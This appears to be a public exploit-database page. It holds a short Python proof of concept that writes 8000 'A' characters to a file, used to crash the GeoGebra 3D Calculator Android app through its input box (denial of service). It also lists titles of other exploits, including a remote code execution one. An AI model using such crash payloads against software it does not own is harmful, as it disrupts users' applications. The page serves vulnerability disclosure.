
6 changes to exploits/shellcodes GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC) Alphaware E-Commerce System 1.0 - Unauthenicated Remote Code Execution (File Upload + SQL injection)
28 lines
No EOL
909 B
Python
Executable file
# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
# Date: 2021-03-15
# Author: Brian Rodríguez
# Software Site: https://www.geogebra.org/download
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
# Version: 5.0.511.0
# Category: DoS (Android)

##### Vulnerability #####

# Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is used in the "Entrada..." text box.
#
# Successful exploitation will cause the application to stop working.
#
# I have been able to test this exploit against Android 10.0.

##### PoC #####

#!/usr/bin/env python

# Payload: 8000 "A" (0x41) characters
buffer = "\x41" * 8000

try:
    # Write the payload to payload.txt; the context manager closes the file
    with open("payload.txt", "w") as f:
        f.write(buffer)
    print("File created")
except OSError:
    print("File cannot be created")